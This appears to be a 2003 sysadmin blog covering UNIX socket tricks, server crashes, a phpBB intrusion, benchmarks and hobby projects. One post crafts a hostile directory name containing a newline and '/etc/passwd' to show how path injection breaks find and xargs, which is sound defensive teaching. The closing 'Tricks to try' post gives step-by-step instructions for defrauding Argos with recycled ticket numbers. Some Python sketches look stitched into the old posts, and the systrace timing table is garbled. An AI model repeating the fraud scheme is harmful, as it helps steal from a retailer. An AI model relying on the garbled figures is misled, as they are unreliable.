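
        if (strlen (path) >= sizeof (addr.sun_path))
                return -1;
        fd = socket (AF_UNIX, SOCK_DGRAM, 0);
        if (fd == -1)
                return -1;

        memset (&addr, 0, sizeof (addr));
        addr.sun_family = AF_UNIX;
        strcpy (addr.sun_path, path);

        /* MSG_DONTWAIT: fail with EAGAIN if the receiver's queue is
         * full, rather than sleeping until the daemon catches up. */
        sent = sendto (fd, msg, strlen (msg), MSG_DONTWAIT,
                       (struct sockaddr *) &addr, sizeof (addr));
        close (fd);
        return sent == -1 ? -1 : 0;
}
```

    A caller would use try_log ("/dev/log", ...) and simply count the failures, so a log daemon stuck in disk wait costs messages rather than the whole process.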

    I'm sure there was someth...

    I'm sure there was something important that I was meant to reply to today but I can't remember what. I expect it will blind-side me about 4pm tomorrow. These things usually do.

    IV was down over the weekend because the webserver died again. We have physically switched boxes for the webserver and it's having the exact same issues as the old one. Autofs is causing a kernel oops that then locks up the VFS layer and after that the webserver is a little useless.

    The maintainer of the code in question (net/sunrpc) has had a look at the stack traces and can't see anything wrong so we are going to see if it happens again (with a 2.4.21 kernel) and start stripping out patches until we can reproduce it in a stock kernel. At that point we add debugging code to try and trap where the dodgy data structure is going dodgy. All on our primary webserver - wonderful.

    And...

    iptables -P INPUT DROP ; iptables -I INPUT -p tcp --destination-port=22 -j ACCEPT

    just made my server drop off the face of the net. That really should have been in one packet, damn you fragments.

    Oh, and train operating staff will be able to use swab kits to add people who spit at them to the UK DNA database. Charming.

    Misspent Youth

    [Amazon link] Frankly, I expected better from Hamilton and probably should have paid heed to the reviewers on Amazon. Hamilton writes some really good books; never hard core sci-fi, but good old fashioned page-turners.

    But the plot of this book reads like a low-budget porno script and the characters are uninteresting and unbelievable. I read to the end, but mainly because I had nothing else to do.

    Autofs

    DoC's primary web server (the server which you are getting this page from) has been failing a lot recently with autofs problems. At one point it died 3 times in as many hours so we switched to a different box and sat it on 146.169.1.10. That was ok for a while until it died in the same place. I hope to get the oops output and have a look.

    But autofs (the userland part) is a little dodgy. It can get upset pretty easily with NFS mounts, and amd (the alternative, written by CSG at Imperial) is only a little better. Both are pretty huge programs for doing a simple task. I think I'll write a replacement over the weekend.

    UNIX tricks

    Little do most people know of UNIX domain sockets. They may only work on the localhost, but when local communication is all you need they offer a number of funky features.

    Firstly, you can find out who is connected to you:

    struct client *
    client_init (int socket)
    {
            struct  ucred creds;
            socklen_t creds_len = sizeof (creds);
            struct  passwd  *pwent;
    
            if (getsockopt (socket, SOL_SOCKET, SO_PEERCRED, &creds, &creds_len) == -1)
                    return NULL;
            if (creds_len != sizeof (struct ucred))
                    return NULL;
            pwent = getpwuid (creds.uid);
            if (!pwent) {
                    syslog_write (slog, LOG_WARNING, "Lookup in passwd for UID %d failed", creds.uid);
                    return NULL;
            }
    

    Secondly, you can pass file descriptors down them:

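    #include <errno.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <sys/uio.h>
    #include <syslog.h>
    
    // Transmits @new_sock over @dest_sock using SCM_RIGHTS
    int
    send_fd (int dest_sock, int new_sock) {
            struct msghdr   msg = {0};
            struct cmsghdr  *cmsg;
            // The union keeps the control buffer aligned for a struct cmsghdr
            union {
                    char            buf[CMSG_SPACE (sizeof (int))];
                    struct cmsghdr  align;
            } ctl;
            char            dummy = 0;
            struct iovec    iov = { &dummy, 1 };
    
            memset (&ctl, 0, sizeof (ctl));
            // Linux only delivers ancillary data over a stream socket if at
            // least one byte of real data goes with it, so send a dummy byte
            msg.msg_iov = &iov;
            msg.msg_iovlen = 1;
            msg.msg_control = ctl.buf;
            msg.msg_controllen = sizeof (ctl.buf);
            cmsg = CMSG_FIRSTHDR (&msg);
            cmsg->cmsg_level = SOL_SOCKET;
            cmsg->cmsg_type = SCM_RIGHTS;
            cmsg->cmsg_len = CMSG_LEN (sizeof (int));
            memcpy (CMSG_DATA (cmsg), &new_sock, sizeof (int));
            // Sum of the length of all control messages in the buffer:
            msg.msg_controllen = cmsg->cmsg_len;
            if (sendmsg (dest_sock, &msg, 0) == -1) {
                    fprintf (stderr, "Failed to write to child: %s\n",
                                    strerror (errno));
                    return 10;
            }
    
            return 0;
    }
    
    // Reads a file descriptor from stdin using SCM_RIGHTS
    // (syslog_write and slog come from the rest of the program)
    int
    get_fd (void)
    {
            union {
                    char            buf[CMSG_SPACE (sizeof (int))];
                    struct cmsghdr  align;
            } ctl;
            struct msghdr   msg = {0};
            struct cmsghdr  *cmsg;
            char            dummy;
            struct iovec    iov = { &dummy, 1 };
            int             fd;
    
            msg.msg_iov = &iov;
            msg.msg_iovlen = 1;
            msg.msg_control = ctl.buf;
            msg.msg_controllen = sizeof (ctl.buf);
            // Expect exactly the one dummy byte that send_fd sends
            if (recvmsg (0, &msg, 0) != 1)
                    return -1;
            // The control message may be missing entirely, so check before use
            cmsg = CMSG_FIRSTHDR (&msg);
            if (!cmsg || cmsg->cmsg_level != SOL_SOCKET ||
                cmsg->cmsg_type != SCM_RIGHTS) {
                    syslog_write (slog, LOG_ERR, "CMSG type was not SCM_RIGHTS");
                    return -1;
            }
            memcpy (&fd, CMSG_DATA (cmsg), sizeof (fd));
            return fd;
    }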
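
    For comparison, here is roughly the same descriptor passing in Python, using the sendmsg and recvmsg methods of socket objects. Treat it as a sketch: the function names are mine, and it sends a single byte of ordinary data alongside the descriptor, which is my choice rather than anything the C code above requires.

```python
import array
import os
import socket


def send_fd(sock, fd):
    """Send one file descriptor over a UNIX domain socket using SCM_RIGHTS."""
    fds = array.array("i", [fd])
    # One byte of ordinary data rides along with the ancillary message.
    sock.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)])


def recv_fd(sock):
    """Receive one descriptor sent by send_fd() and return it."""
    fds = array.array("i")
    msg, ancdata, flags, addr = sock.recvmsg(1, socket.CMSG_LEN(fds.itemsize))
    for level, ctype, data in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_RIGHTS:
            # Ignore any trailing partial int in the control data.
            usable = len(data) - (len(data) % fds.itemsize)
            fds.frombytes(data[:usable])
            return fds[0]
    raise RuntimeError("no SCM_RIGHTS message received")


if __name__ == "__main__":
    parent, child = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    read_end, write_end = os.pipe()
    send_fd(parent, write_end)
    passed = recv_fd(child)
    # Writing to the received descriptor shows up on the original pipe.
    os.write(passed, b"hello")
    print(os.read(read_end, 5))
```

    The received descriptor is a new number that refers to the same open file, which is why writing to it feeds the original pipe.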
    

    The webserver is on its ...

    The webserver is on its last legs and will almost certainly die over the weekend. (Hint: never use Reiserfs).

    IV should still be on http://tweetypie.doc.ic.ac.uk/~agl02/ however. But if the primary server is down, how do you get that URL?

    Something to ponder..

    God, building packages fo...

    God, building packages for apache+php+mod_perl+kitchen sink is so painful. A million paths woven together into one huge diabolical ubermess. Sigh. I guess I'll get there in the end.

    Mail should be working ag...

    Mail should be working again.

    This article on 3d printing was linked to on slashdot. It's a pretty short and dull introduction, but it foreshadows another key battle on the copyright front. Personally, I think that Gilmore expressed it far better in this text. It's going to be a painful few decades while these changes sink in.

    sfdisk -s returned a negative number for me today, caused by the 2TB limit on 32-bit sector counts. This seems like it's going to be a pretty painful transition as many utilities (even the kernel, until 2.6) have this limit. sfdisk, despite being in util-linux, is actually pretty badly written. It assumes in several places that sizeof (long) = 4. I might end up rewriting large parts of it because cyl/head/sectors have got to go.
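
    The arithmetic behind that limit is easy to check. The sketch below assumes classic 512-byte sectors and, for the negative number, assumes a size counted in 1KiB blocks and squeezed into a signed 32-bit integer. It illustrates the wrap-around only; it is not sfdisk's actual code, and the helper names are made up.

```python
SECTOR_BYTES = 512   # assumption: classic 512-byte sectors
BLOCK_BYTES = 1024   # assumption: sizes reported in 1KiB blocks
TIB = 1024 ** 4


def max_bytes_addressable(bits=32, sector_bytes=SECTOR_BYTES):
    """Largest size that a sector count of the given width can describe."""
    return (1 << bits) * sector_bytes


def as_int32(value):
    """What value looks like after being stored in a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value >= (1 << 31) else value


if __name__ == "__main__":
    print(max_bytes_addressable() // TIB, "TiB")   # the 32-bit sector limit
    blocks = 3 * TIB // BLOCK_BYTES                # a hypothetical 3TiB device
    print(blocks, "->", as_int32(blocks))          # goes negative
```

    Anything that keeps such counts in a 32-bit long will show the same behaviour once devices pass the limit.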

    Hawk is not getting SMTP,...

    Hawk is not getting SMTP, so no email is getting through at the moment.

    Use agl02 AT doc.ic.ac.uk if need be.

    find -print0

    See, I don't understand what all this filesharing fuss is about. People put so much effort into Kazaa, Gnutella and other weirdly named stuff.

    All you need is a user running a buggy version of phpBB, a gigabaud link to the Internet and people will upload stuff to you! 84GB of stuff to be precise onto our primary fileserver. It says something about the systems at Imperial that this was such small fry that it didn't even register for a few days until they set up ftp servers and our webserver was a couple of places higher than normal on the list of hosts by outbound traffic.

    What's really amusing is watching the script kiddie's exploit. (Yes, we keep full packet logs of everything for a couple of weeks, so we just scanned back and selected that TCP stream). They connected and it's so obvious that they didn't have a clue. They were pasting commands in (multiple commands in 1 packet) and couldn't use grep. They would ls -lR to find somewhere to put their files and hit ^C after a while ... before doing it again and trying to hit ^C at the right place because it had gone off the top of the screen.

    (I would usually lock php right down to stop user level compromises like this. But it's a university and we are meant to give them pretty free run. And yes, the user web and db servers do get buggered silly on a fairly regular basis as scripts run amok.)

    I was explaining to someone the importance of using the -print0 argument to find when working in untrusted paths. Often the output of find is piped into a program like xargs using newlines to delimit files. The -print0 option (and the -0 option to xargs) uses null bytes instead.

    Try this example:

    % python
    Python 2.2.3 (#1, Jul 12 2003, 15:30:57) 
    [GCC 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r1, propolice)] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import os
    >>> os.mkdir ("foo\n"); os.mkdir ("foo\n/etc");
    >>> open ("foo\n/etc/passwd", "w+").close ()
    >>>
    % find
    .
    ./foo
    
    ./foo
    /etc
    ./foo
    /etc/passwd
    

    Oops! Where did /etc/passwd come from? Let's hope that xargs wasn't doing anything nasty.
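
    To see why the NUL separator fixes this, here is a small Python sketch that builds both kinds of output for the same four paths and splits them the way a consumer would. The helper names are made up and no real find or xargs is run.

```python
def split_newline(output):
    """Split the way a newline-delimited consumer would (blank lines dropped)."""
    return [p for p in output.split(b"\n") if p]


def split_nul(output):
    """Split on NUL bytes, as a -0 style consumer would."""
    return [p for p in output.split(b"\0") if p]


# The directory tree from the example, one entry per real path.
paths = [b".", b"./foo\n", b"./foo\n/etc", b"./foo\n/etc/passwd"]

newline_output = b"".join(p + b"\n" for p in paths)  # like find -print
nul_output = b"".join(p + b"\0" for p in paths)      # like find -print0

if __name__ == "__main__":
    print(split_newline(newline_output))  # bogus entries such as b"/etc/passwd"
    print(split_nul(nul_output))          # exactly the four real paths
```

    A NUL byte can't appear in a path, so it is the only separator that can't be forged by a hostile filename.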

    Opteron Benchmarks

    These results are completely unfair and shouldn't be taken as gospel in any way. Lithium is the dual Opteron (its specs are in a previous post), lithium32 is Lithium running 32-bit code (Mandrake 9.1) and Loch is a dual 2.66GHz Xeon with only 1GB of memory (Lithium has 4). Lithium only has an ATA disk, while Loch is LVD SCSI. I tried as much as possible to allow both systems to keep everything in buffer cache.

    Everything was run with GCC 3.3, but keep in mind that Lithium (in 64-bit mode) is actually building a slightly different kernel (x86-64, not i386).

    make 2.6.0-test1, default configure, no -j
    lithium:	4m33
    lithium32:	5m26
    loch:		5m41
    
    make 2.6.0-test1, after make clean, -j4
    lithium:	2m27
    lithium32:	2m48
    loch:		2m57
    
    make 2.6.0-test1, after make clean, -j8
    lithium:	2m28
    lithium32:	2m48
    loch:		3m08
    
    md5sum of 512M zero file (in buffer cache)
    lithium:	3.1s
    lithium32:	10.6s
    loch:		3.4s
    stimpy:		16.8s
    

    Stimpy is another Mandrake box because I didn't quite believe the result for Lithium in 32-bit mode. It seems that Mandrake 9.1's md5sum just sucks, so ignore lithium32's result in that.
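
    If you want the kernel build times as ratios rather than minutes, a few lines of Python will do it. This only re-expresses the no -j figures from the table above, with Lithium in 64-bit mode as the baseline; to_seconds is a made-up helper.

```python
def to_seconds(stamp):
    """Convert a time written like '4m33' into seconds."""
    minutes, seconds = stamp.split("m")
    return int(minutes) * 60 + int(seconds)


# Figures copied from the "no -j" kernel build above.
no_j = {"lithium": "4m33", "lithium32": "5m26", "loch": "5m41"}

base = to_seconds(no_j["lithium"])
relative = {host: round(to_seconds(t) / base, 2) for host, t in no_j.items()}

if __name__ == "__main__":
    for host, ratio in relative.items():
        print("%-10s %.2fx" % (host, ratio))
```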

    Gentoo AMD64

    This just makes my blood boil. I really shouldn't read these articles, I'm sure it's bad for my health or something. These idiots will always exist.

    Gentoo AMD64 lives! It takes quite a lot of trickery, but it's building KDE at the moment (heck, have to do something with all of those cpu cycles!). I might post a stage1 file at some point, but the semi-official Gentoo amd64 stage1 files will be out soon. Mostly I did it for the experience.

    Who needs this filesystem malarkey anyway?

    You know, my home system didn't feel slow till I started using the dual Opteron system. Heck, even the dual Xeon-HT's don't feel as nippy and it's running 32-bit code.

    I posted a note to python-dev today about finding the size of types at configure time. Almost nothing except glibc, gcc and binutils works cleanly when cross compiling. GNU autoconf should mean that setting --host and --build makes everything work magically. Does it hell.

    (p.s. glibc 2.3.2 cannot be cross compiled, use 2.3.1. And both of these versions misdefine sscanf - you have to correct it in stdio-common/sscanf.c first.)

    One of the dumbest things in configure scripts is when they don't try tests because they can't run the compiled code (because it's x86-64 code). The script knows it's a cross and just gives up. In the case of Python it assumes that the sizes of int etc are for 32-bit. (Except for fpos_t, for which it's correct for an 8-bit system). But there's no reason to run compiled code to get this information.

    #include <asm/types.h>
    #include <sys/types.h>
    
    const   __u8    sizeof_int[sizeof(int)];

    And so on. Then compile the code and objdump -t sizeof.o | grep -E 'sizeof_[^ ]+$' | awk '{ print $5 " " $1; }' will give you all the information. Works perfectly for native and cross compilers.

    DJB exchanged emails about his call for a disablenetwork() syscall. My point was basically that he was thinking about it the wrong way round. It shouldn't be a disablenetwork call, but a case of "I didn't explicitly give you a network capability".

    I also remarked that if you were going to go the capability route you could also chroot() everything and give it a UNIX domain socket via which it could make its filesystem calls. This would make restricting programs pretty simple as you have one point of access for all filesystem control. (It would be a UNIX domain socket because they can have file descriptors passed between processes over them).

    He suggested that few programs really need the filesystem (and would you look at the date on that?) and that it has more than security implications:

    A small interface (for example,
    a descriptor allowing read() or write()) supports many implementations
    (disk files; network connections; and all sorts of interesting programs
    via pipes), dramatically expanding the user's power to combine programs.
    A big interface (for example, a file descriptor that allows directory
    operations) naturally has far fewer implementations.

    Which is actually really cool. Most programs could do without the full-fledged filesystem and it would be useful to be able to redirect their access down a pipe or socket. There are a number of problems with being able to do this that would probably need a kernel patch: mmapping for one, and the problem of not being able to pass fds between machines.
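
    The "small interface" point is easy to demonstrate. In this Python sketch (count_bytes is a made-up name) one function that only ever calls read() works unchanged on a disk file, a pipe and a socket, because all it needs is a descriptor.

```python
import os
import socket
import tempfile


def count_bytes(fd, chunk=65536):
    """Count the bytes readable from any descriptor that supports read()."""
    total = 0
    while True:
        data = os.read(fd, chunk)
        if not data:  # empty read means end of file / peer closed
            return total
        total += len(data)


if __name__ == "__main__":
    # A pipe.
    r, w = os.pipe()
    os.write(w, b"abc")
    os.close(w)
    print("pipe:", count_bytes(r))

    # A UNIX domain socket.
    a, b = socket.socketpair()
    a.sendall(b"hello")
    a.close()
    print("socket:", count_bytes(b.fileno()))

    # A regular file.
    with tempfile.TemporaryFile() as f:
        f.write(b"12345678")
        f.seek(0)
        print("file:", count_bytes(f.fileno()))
```

    Anything that needed directory operations on that descriptor would rule out two of the three cases straight away.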

    Just testing SVG

    Just testing...

    That should be 3 SVG circles if your browser can handle it. Hopefully nothing explodes too badly.

    If all the colours are wrong (it will look grey with lines going down it) then you're hitting a known bug in Mozilla. It's fixed in CVS.

    Opterons

    Woooo....

       
    	librt.so.1 => /lib64/librt.so.1 (0x0000002a9566d000)
    	libacl.so.1 => /lib64/libacl.so.1 (0x0000002a95785000)
    	libc.so.6 => /lib64/libc.so.6 (0x0000002a9588b000)
    	libpthread.so.0 => /lib64/libpthread.so.0 (0x0000002a95abb000)
    	libattr.so.1 => /lib64/libattr.so.1 (0x0000002a95bd7000)
    	/lib64/ld-linux-x86-64.so.2 => /lib64/ld-linux-x86-64.so.2 (0x0000002a95556000)

    Yes, that's a 30GB mmap...

    open("/dev/hda", O_RDONLY)              = 3
    mmap(NULL, 32212254720, PROT_READ, MAP_SHARED, 3, 0) = 0x2a9589d000
    
    processor       : 0
    vendor_id       : AuthenticAMD
    cpu family      : 15
    model           : 5
    model name      : AMD Opteron(tm) Processor 242
    stepping        : 1
    cpu MHz         : 1595.065
    cache size      : 1024 KB
    fpu             : yes
    fpu_exception   : yes
    cpuid level     : 1
    wp              : yes
    flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext lm 3dnowext 3dnow
    bogomips        : 3178.49
    TLB size        : 1088 4K pages
    clflush size    : 64
    
    processor       : 1
    vendor_id       : AuthenticAMD
    cpu family      : 15
    model           : 5
    model name      : AMD Opteron(tm) Processor 242
    stepping        : 1
    cpu MHz         : 1595.065
    cache size      : 1024 KB
    fpu             : yes
    fpu_exception   : yes
    cpuid level     : 1
    wp              : yes
    flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext lm 3dnowext 3dnow
    bogomips        : 3185.04
    TLB size        : 1088 4K pages
    clflush size    : 64
    

    Gentoo x86-64 hopefully coming soon...

    nfs-utils 1.0.3 and 1.0.4...

    nfs-utils 1.0.3 and 1.0.4 are buggy (1.0.4 is the one with the new xlog security patch). Use 1.0.1 and get the xlog patch from somewhere else and apply it manually.

    If you get a motherboard with a `3COM 3c940' builtin (it doesn't exist in a standalone form at the moment) the driver you need is actually an sk98. I have the patch handy if anyone ever needs it.

    Nuclear landmines (and no, it's not the Yanks again this time).

    HTML Through CSS

    nForce 2 chipsets

    The nForce2 chipset (from nVidia) is popular for AMD systems at the moment, just don't buy one if you're running Linux. nVidia supplies drivers from its website for the builtin network, gfx and audio (possibly others, I didn't get that far) as modules - more than slightly frustrating for an NFS root. Still, I managed to get the driver into the kernel (including the closed source binary part) and it half works - the sending half.

    The graphics part doesn't handle VESA DDC calls and seems to freeze completely with the nv driver.

    In short, avoid unless you like waiting for nVidia to drip feed you closed source drivers.

    Some people may have noticed that there's some documentation that has appeared in the CSG section in the site tree at the bottom. Since I haven't released the code you probably don't want to read it, but the interesting bit is that I just made up the tags. (If you see all the text stuck together then your browser doesn't like this - try Mozilla). Each of the functions looks a little like this:

    <function>
    	<name>function_name</name>
    	<args>
    		<arg><type>string</type><name>filename</name></arg>
    	</args>
    </function>

    And then I just define them in CSS:

    function { background: #f3f6fd; display: block; margin-bottom: 30px; }
    function > name { font-family: monospace; padding-bottom: 10px; display: block; color: #0000dd; }
    function > name:before { font-family: Georgia, Times, sans-serif; content: "Name: "; color: #000000; }
    function > args { display: block; margin-bottom: 10px; }
    function > args:before { content: "Arguments: "; }
    ...

    Mozilla renders it ok, Konqueror doesn't and I've not tried anything else. Is this in the slightest valid in XHTML? It certainly feels XMLish.

    And if it is valid, why isn't the XHTML standard just a common CSS stylesheet? I'm pretty sure you can define every HTML tag in CSS.

    I should write more than ...

    I should write more than I'm going to this entry, maybe I'll write the rest later on tonight.

    But the main point is that my phone eloped with my modem and ran off to Nevada to get married over the weekend so:

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    My number, current as of 14/7/2003 is +44 (0)7906 332512
    
    AGL
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.2 (GNU/Linux)
    
    iD8DBQE/Ewm6zaVS3yy2PWARApCVAKCQZvbUIYdzf/ue5Cdl9r3WYGIeYQCgvRM3
    H4ki+BlNXHPm29KGiEF4A20=
    =jG6K
    -----END PGP SIGNATURE-----

    freenetproject.org nuked

    Ian's on holiday at the moment and I met up with him and Janie yesterday in south London. It's been too long since I saw them, but it's good to see that they're still together and doing well. Janie needs better shoes, but these things are fixable :)

    Unfortunately, they're also out of contact. Their phone can't do incoming calls and I only have a vague idea of where they're staying. This would be fine except that Go Daddy nuked the freenetproject.org DNS (or possibly Ian renewed the domain too late) and it seems that only Ian can alter the account. This killed mail to imperialviolet.org too, but only briefly.

    Thankfully, the /. story about Freenet linked to the other name for the website. (And do read that story, it's really good; well done Ian).

    Bugger. While trying to g...

    Bugger. While trying to get gdm working for the new Dept of Computing base install it looks like I screwed up a fair amount of stuff. That includes email from last night until now (I don't think it would have bounced - it just got vapourised), IV, comments etc.

    So any important emails should be resent, please.

    Oh, and the answer was that calling exec in any startup script (which is common practice here to change shells) causes gdm to fail with a completely unhelpful error message. I think we might be using kdm now.

    BBC Vorbis Streaming

    Firstly, an email I sent to the BBC Online Services Support list today:

    Three sysadmins from Imperial College (http://www.doc.ic.ac.uk/csg),   
    myself included, are temporarily living in White City - just up the
    road from the main BBC complex. We would very much like to see the
    Ogg Vorbis streams of BBC Radio running again.
    
    The last entry on http://support.bbc.co.uk/ogg/ reads (in part)
    "we simply do not have time right now to get the ogg streams running again"
    With this in mind, we would like to offer our services to help with
    this project in any way.
    
    Is there any way that this is possible?

    Now, I'm almost certain that this will either generate a polite brush-off or will just be ignored. With this in mind, I've worked out how to do it myself:

    BBC Vorbis Streaming HOWTO

    Firstly, you need recent versions of libxml, libxslt, libvorbis and icecast2. The first three are pretty standard, but Icecast2 is only available from CVS snapshots. The modules you'll need are icecast, ices2 and libshout. libshout is required to build ices2.

    You'll also need RealPlayer for Linux, since this is the only source of BBC Radio data at the moment. You could just pipe a radio into the linein, but the quality of this is likely to be a bit crappy. Though it would get rid of the nasty time lag in BBC Real streams.

    We'll setup icecast in a minute, but we also need to download dsproxy. This traps data sent to /dev/dsp and outputs it as PCM data. Download and build dsproxy (needs root to insmod). I run devfs, so my /dev/dsp etc are just symlinks into /dev/sound/, so I can replace them at any time but realplay is going to need to see the dsproxy devices when it starts up. You could chroot RealPlayer and point the sound devices in the chroot to dsproxy, but I haven't played with that. At the moment I'm setting up the devices to start realplay and then switching them back to the OSS devices for normal usage. However you decide to do it, here are the device numbers:

    • OSS dsp: 14, 3
    • OSS mixer: 14, 0
    • dsproxy dsp: 121, 2
    • dsproxy mixer: 121, 3

    So, for the moment, create the dsproxy devices as /dev/dsp and /dev/mixer (cd /dev ; rm dsp mixer ; mknod dsp c 121 2 ; mknod mixer c 121 3). Now we are ready to start the reader and realplay, so we configure icecast.

    Icecast has two parts - the server and the source. The server is icecast, the source is ices2. My config for the icecast server is here. Note that the password is XYZ and it puts stuff in /tmp/icecast (you may need to create /tmp/icecast/[log|web|admin]). My config for ices2 is here. You may wish to have a look in the example configs as well to see the other options available.

    You should now be able to start up icecast (pass the -c option to specify the config file). In another terminal go to the dsproxy source directory and run ./reader -x -e -s | /path/to/ices-2.0-Beta2/src/ices /path/to/ices-2.0-Beta2/src/ices.xml.public. That should start the source up; it will log to the terminal. Now start realplay and run the Radio 4 stream (http://www.bbc.co.uk/radio4/realplayer/media/fmg2.rpm). You should be able to stream from http://testhost:8000/radio4.ogg.

    It's pretty rough still, but it's working for me at the moment.

    Altered Carbon

    I needed a book to read (had a few days without a computer) and Altered Carbon seemed as good a choice as any, and I'd recently read this /. review about it.

    This book isn't going to be as influential as the /. reviewer thinks. As far as sci-fi goes it's mediocre. It's set in the future, rather than being an exploration of it. People in this world have the ability to digitise their minds and switch bodies as market forces allow. But this just provides a few neat plot hooks - it isn't an Egan-like world here.

    What this book does give is a really good detective story. Not a culture changing item, but excellent crime-sci-fiction.

    The end of term involved t...

    The end of term involved the Union Summer Beach Party. Not quite sure about that name, there wasn't much beach involved. It did involve several days of setting up with miles of cables going round the quad. The photos are here. It looked pretty stunning and everyone seemed to have a good time. I'm afraid, however, that after working 14 hours on Thurs and 16 on Friday I went to sleep about 1am Saturday morning, leaving the rest of the crew to strike the fixtures. In my defence, I did have to be up at 7 to pack!

    Some pics of the photos

    Defending C++

    Ian:

    Don't bother telling me that Freenet should be implemented in C++ unless you are willing to spend months illustrating your code on stretched leather with a carefully prepared pheasant feather while paying particular attention to the initial "#".

    Well, I did do this and here's why:

    • I wanted to learn C++
    • The Java Freenet code was making mistakes in areas such as crypto that only an independent implementation was going to uncover
    • I don't like Java

    I learnt C++ pretty well and it really is a messy pre-processor for C. There are hundreds of tiny quirks waiting to bite you, not just in the language, but with each different compiler (looking at Microsoft here). It's a mess and really shouldn't be used for anything, but it still is. And that's not just because the great unwashed masses haven't learnt about Java.

    C++ is popular because it's actually a good tool for a lot of jobs - still riding C's wave from the 1970's. Interfaces are written for it and with it in mind and some people have done jaw-dropping stuff with such a mess of a language.

    (I've never used C# - and I'm in no position to comment on it directly. I'm just using the general opinion that, in language space, C# is standing on Java's toes.)

    But that certainly doesn't mean that everyone would be using Java and C# if C++ didn't have so much momentum. Despite great improvements, Java code is still just slow. Even on fast machines you can feel the lethargy of Java GUI programs. No amount of micro-benchmarks change this. And the Java library isn't just "artistically uninspired", it's cringe worthy - huge class names everywhere and interfaces designed by committee. At least C/C++ interfaces are generally short and to the point.

    To some extent Ian is correct, however, that Java is more of an engineering language than an artist's language. Java does manage to give programming idiots a language which they can use in a big organisation without giving them sharp objects to poke themselves with (e.g. pointers).

    But if you are going to get away from C's perfectionism then I would suggest that Python is a far better place to be. Python for the times that you want brush strokes with C modules for the awkward details. Java/C# is too thin to cover with and too thick to touch up with.

    Usually I shrug off a col...

    Usually I shrug off a cold in a few hours but, right now, every time I sneeze it feels like most of my throat is ripped out and I think my brain is trying to crawl out my left ear.

    But anyway - X auto-configuration is quite painful. The basics (finding video cards) are pretty trivial, but how do you find the model name of the LCD connected? (possible) and how do you do that for each of a number of different video cards on the same PCI bus, each with multiple heads? From what I can see VESA just wasn't designed to handle multiple cards.

    On the same project, how do you get a BIOS device number from a devfs name? Going from devfs => classical /dev just involves walking /dev/discs but, as far as I can see, there is no mapping to BIOS device numbers (needed for GRUB). For example, my kernel loads my SCSI MegaRAID before my Adaptec SCSI - but my BIOS does it the other way round. Aggh!

    Ian seems set on making up for lost blogging time with a flurry of interesting posts. I'm sure he can't keep it up for long, so enjoy while it lasts.

    Looking in my bookmarks:

    Smyle Productions: Googlebomb

    Smyle Productions <- attempt to Googlebomb the company that did the Imperial Summer Ball. Unfortunately I don't have any photos from it (yet).

    This is from a nameless p...

    This is from a nameless person (not a student, however) in the Dept of Computing

    my main computer has been disconnetted and Catherine Wang's hard-disk and keyboard connected to my screen.

    I so wanted to ask her for a PS2+IDE to VGA wiring diagram.

    I'm glad that Ian liked...

    I'm glad that Ian liked Equilibrium. Someone pointed this film out to me a couple of months ago and I agree that it's pretty fantastic. It's interesting what a difference a marketing budget can make; in my opinion this film is better than The Matrix.

    There's very little new in it - pretty much everything comes straight from 1984, Fahrenheit 451 or The Matrix, but you know what? It doesn't really matter because they've taken the good parts.

    O'Reilly 25th

    This year is the 25th anniversary of O'Reilly as a company. To celebrate, O'Reilly had a boat party going down the Thames (the river that runs through London).

    I wouldn't wish to pick out a few names from the numbers there so I'm not going to. But there were over a hundred authors, editors and members of the UK Linux/Open Source community there as well as the guest of honour, Mr O'Reilly himself (who was about 45 minutes late).

    Free food, free bar, interesting people - what more could you want? I had a great time.

    Read this if, and only if...

    Read this if, and only if, you have seen the Matrix Reloaded already.

    Ian has updated his blog with quite a long entry. Here's a reply I sent via email:

    Whisper: Do you pad messages? I'm sure you have considered that the IRC backend
    still allows for traffic analysis, but I'm not sure how useful traffic
    analysis is in IRC style conversations.
    
    I've not played with C# much, but I don't think I would use it out of choice
    from what I've read about it. Any particular reason you chose it over
    Java for this?
    
    WebQuest: Not a new idea - but you would be the first if you actually got it
    to work nicely. The whole trick here is that it will get spammed to hell as soon
    as it becomes popular. You don't mention how you act against this.
    
    Using Google as a backend and tweaking the search query is a nice trick.
    
    "Collaborative Filtering" of course springs to mind and a trust web could solve
    your spamming problem at the cost of bootstrapping problems (you need people to
    form a trust web, but people aren't going to bother unless there are already people
    doing it).
    
    Kanzi: Shame it didn't work out as shareware - but I'm glad to see it going Open
    Source (at some point).
    

    Systrace timing tests:Tes...

    Systrace timing tests:

    TestNormalWith Systrace
    getuid0.8711.38
    getpid0.8711.38
    stat0.8711.38

    All 3 tests did a million calls of their respective syscalls. The first two were setup in systrace to allow everything. The filesystem test was setup to allow only if a regexp matched.

    Conclusion: the overhead is pretty much fixed - and not really that huge unless you are really syscall dependent.
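
    For anyone wanting to repeat something like this, here is a rough Python harness of the same shape: call one syscall wrapper a million times and time it. It is a sketch and not the program that produced the numbers above. The interpreter's own loop overhead is included in every figure, so only the difference between a run with and without systrace means much. The path "/" for stat is an arbitrary choice of mine.

```python
import os
import time


def time_calls(func, count=1_000_000):
    """Return the seconds taken to call func() count times."""
    start = time.perf_counter()
    for _ in range(count):
        func()
    return time.perf_counter() - start


if __name__ == "__main__":
    tests = {
        "getuid": os.getuid,
        "getpid": os.getpid,
        "stat": lambda: os.stat("/"),  # "/" is an arbitrary path choice
    }
    for name, func in tests.items():
        print("%-8s %.2fs" % (name, time_calls(func)))
```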

    Tricks to try

    Go into Argos, buy something really cheap and leave. Wait (possibly several days) for the ticketing system to wrap round (it's only 3 digits) and go and claim an (almost certainly) more expensive item with the same number (they never check the description, which is in a much smaller font). For bonus points, have a friend get the duplicate ticket and walk off with 2 of the expensive item after the friend complains that his never arrived.

